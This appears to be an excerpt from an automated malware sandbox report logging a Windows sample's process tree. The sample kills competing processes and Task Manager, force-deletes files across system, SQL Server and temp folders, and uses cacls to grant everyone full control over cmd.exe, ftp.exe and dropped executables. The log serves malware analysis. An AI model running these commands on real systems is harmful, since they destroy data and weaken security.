cmd /c del /f /a /q C:\Program Files (x86)\Microsoft SystenApp\Systen64.exe
2⤵
PID:3588

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SystenApp\Systen64.exe
2⤵
PID:3256

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im spoolys.exe
2⤵
PID:480

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolys.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\Help\spoolys.exe
2⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im lsma12.exe
2⤵
PID:452

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im lsma12.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\INF\aspnet\lsma12.exe
2⤵
PID:2208

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im lsma22.exe
2⤵
PID:228

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im lsma22.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\INF\aspnet\lsma22.exe
2⤵
PID:392

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im assm.exe
2⤵
PID:2360

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im assm.exe
3⤵
- Kills process with taskkill
PID:3120

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe
2⤵
PID:2384

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4516

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\assm.exe
2⤵
PID:1784

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im sqlcmd.exe
2⤵
PID:3328

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlcmd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4260

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe
2⤵
PID:3296

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sqlcmd.exe
2⤵
PID:4164

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhos.exe
2⤵
PID:3520

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhos.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhos.exe
2⤵
PID:872

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhos.exe
3⤵
- Kills process with taskkill
PID:3616

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhou.exe
2⤵
PID:1820

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhou.exe
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhou.exe
2⤵
PID:1212

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3500

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhou.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3476

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im m6.bin.bin.exe
2⤵
PID:4388

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im m6.bin.bin.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im javaw.exe
2⤵
PID:4948

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im javaw.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im clsso.exe
2⤵
PID:2000

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im clsso.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1344

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:2756

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3140

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:3940

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoz.exe
2⤵
PID:3736

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoz.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:796

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoy.exe
2⤵
PID:4660

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoy.exe
3⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im conhoy.exe
2⤵
PID:2432

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im conhoy.exe
3⤵
- Kills process with taskkill
PID:3820

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im csrs.exe
2⤵
PID:4844

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im csrs.exe
3⤵
- Kills process with taskkill
PID:364

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im csrs.exe
2⤵
PID:480

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im csrs.exe
3⤵
PID:3108

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im sysdo.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3120

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sysdo.exe
3⤵
- Kills process with taskkill
PID:4052

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im sysdo.exe
2⤵
PID:5060

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sysdo.exe
3⤵
- Kills process with taskkill
PID:1244

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SqlManagement.exe
2⤵
PID:2336

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SqlManagement.exe
3⤵
- Kills process with taskkill
PID:4284

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\sSqlManagement.exe
2⤵
PID:3012

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SqlManagement.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SystemManagement.exe
2⤵
PID:4104

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SystemManagement.exe
3⤵
- Kills process with taskkill
PID:3188

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe
2⤵
PID:4700

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\SystemManagement.exe
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q %ProgramFiles%\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\DATA\SqlManagement\*
2⤵
PID:3824

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im taskmgr.exe
2⤵
PID:5016

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskmgr.exe
3⤵
- Kills process with taskkill
PID:4412

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.vbs
2⤵
PID:3068

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.dll
2⤵
PID:3904

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.txt
2⤵
PID:4480

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.bat
2⤵
PID:224

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.json
2⤵
PID:4956

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\ProgramData\*.ini
2⤵
PID:3708

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\*.exe
2⤵
PID:5048

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.vbs
2⤵
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.dll
2⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.txt
2⤵
PID:3392

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.bat
2⤵
PID:1292

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.json
2⤵
PID:4540

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\RECYCLER\*.ini
2⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\*.exe
2⤵
PID:212

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/*.exe
2⤵
PID:4844

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.ini
2⤵
PID:3016

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.json
2⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.bat
2⤵
PID:364

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.txt
2⤵
PID:1284

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.dll
2⤵
PID:1112

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:/RECYCLER/*.vbs
2⤵
PID:4724

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im wscript.exe
2⤵
PID:776

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im wscript.exe
3⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWD.exe
2⤵
PID:2336

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWD.exe
3⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWA.exe
2⤵
PID:2104

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWA.exe
3⤵
- Kills process with taskkill
PID:4356

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWB.exe
2⤵
PID:4360

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWB.exe
3⤵
PID:340

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTSWC.exe
2⤵
PID:3584

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTSWC.exe
3⤵
PID:4496

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENAC.exe
2⤵
PID:4416

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENAC.exe
3⤵
- Kills process with taskkill
PID:1144

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:3152

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:3520

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f
2⤵
PID:2012

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\sqlagentc.exe /e /t /g system:f
3⤵
PID:3592

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:3880

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f
2⤵
PID:3232

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\sqlagentc.exe /e /t /g system:f
3⤵
PID:1100

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:1616

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:5020

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:1516

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:880

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:3588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:3508

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:3772

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:224

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:3000

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:3264

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:4012

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTC.exe
2⤵
PID:2432

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTC.exe
3⤵
- Kills process with taskkill
PID:2176

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTC.exe
2⤵
PID:4316

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTC.exe
3⤵
PID:1712

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:3536

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:3604

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f
2⤵
PID:1796

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\sqlagentc.exe /t /g system:f
3⤵
PID:4276

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
2⤵
PID:2016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g everyone:f
3⤵
PID:3960

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
2⤵
PID:2284

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\sqlagentc.exe /e /t /g system:f
3⤵
PID:4900

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTN.exe
2⤵
PID:1408

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTN.exe
3⤵
- Kills process with taskkill
PID:3912

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTN.exe
2⤵
PID:1484

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTN.exe
3⤵
PID:1424

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTA.exe
2⤵
PID:3228

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTA.exe
3⤵
PID:4672

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGENTA.exe
2⤵
PID:4676

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGENTA.exe
3⤵
PID:4932

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:4396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:3940

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:3856

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:316

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:3544

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:2780

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:760

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f
2⤵
PID:4756

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQLSERVER\AppData\Local\Temp\SQLAGEATC.exe /t /g system:f
3⤵
PID:3436

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:4412

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\MSSQL~1\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:3620

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:4916

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:4008

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:4868

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:3500

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:2940

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:4340

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:3440

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:4532

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:1444

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\1\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f
2⤵
PID:5048

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g system:f
3⤵
PID:4464

C:\Windows\SysWOW64\cmd.exe
cmd /c cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f
2⤵
PID:3376

C:\Windows\SysWOW64\cacls.exe
cacls C:\Users\Administrator\AppData\Local\Temp\2\SQLAGEATC.exe /e /t /g everyone:f
3⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATC.exe
2⤵
PID:4240

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATC.exe
3⤵
- Kills process with taskkill
PID:480

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATC.exe
2⤵
PID:3304

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATC.exe
3⤵
PID:972

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATN.exe
2⤵
PID:3760

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATN.exe
3⤵
- Kills process with taskkill
PID:3476

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATN.exe
2⤵
PID:4316

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATN.exe
3⤵
PID:3912

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATA.exe
2⤵
PID:4476

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATA.exe
3⤵
- Kills process with taskkill
PID:1820

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /f /im SQLAGEATA.exe
2⤵
PID:220

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im SQLAGEATA.exe
3⤵
- Kills process with taskkill
PID:3664

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\MSSQL~1\AppData\Local\Temp\*
2⤵
PID:3328

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\MSSQLSERVER\AppData\Local\Temp\*
2⤵
PID:3428

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\Temp\*
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\*
2⤵
PID:4416

C:\Windows\SysWOW64\cmd.exe
cmd /c del /f /a /q C:\Users\Administrator\AppData\Local\Temp\*
2⤵
PID:4100

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\TempUpdate2.bat
2⤵
PID:1480

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f
3⤵
PID:3136

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f
3⤵
PID:4820

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g everyone:f
3⤵
PID:1932

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g everyone:f
3⤵
PID:3012

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f
3⤵
PID:4880

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f
3⤵
PID:5060

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\@cacls.exe" /e /t /g system:f
3⤵
PID:2480

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\@cacls.exe" /e /t /g system:f
3⤵
PID:2176

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f
3⤵
PID:4900

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f
3⤵
PID:4456

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g everyone:f
3⤵
PID:2688

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g everyone:f
3⤵
PID:816

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g system:f
3⤵
PID:1752

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f
3⤵
PID:4228

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\cmd.exe" /e /t /g system:f
3⤵
PID:1572

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\cmd.exe" /e /t /g system:f
3⤵
PID:5016

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f
3⤵
PID:4236

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f
3⤵
PID:484

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g everyone:f
3⤵
PID:3236

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g everyone:f
3⤵
PID:4844

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g system:f
3⤵
PID:3508

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f
3⤵
PID:2264

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\system32\ftp.exe" /e /t /g system:f
3⤵
PID:3880

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Windows\SysWOW64\ftp.exe" /e /t /g system:f
3⤵
PID:2296

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Gsmarn64.exe
3⤵
- Kills process with taskkill
PID:3444

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Gsmarn64.exe
3⤵
PID:1692

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Gsmarn32.exe
3⤵
- Kills process with taskkill
PID:2916

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Gsmarn32.exe
3⤵
PID:2484

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CGlobalan.exe
3⤵
- Kills process with taskkill
PID:4052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im CGlobalan.exe
3⤵
PID:4112

C:\Windows\SysWOW64\cacls.exe
Cacls "C:\Windows\SystemCvlsa\*" /t /e /c /r everyone
3⤵
PID:3592

C:\Windows\SysWOW64\cacls.exe
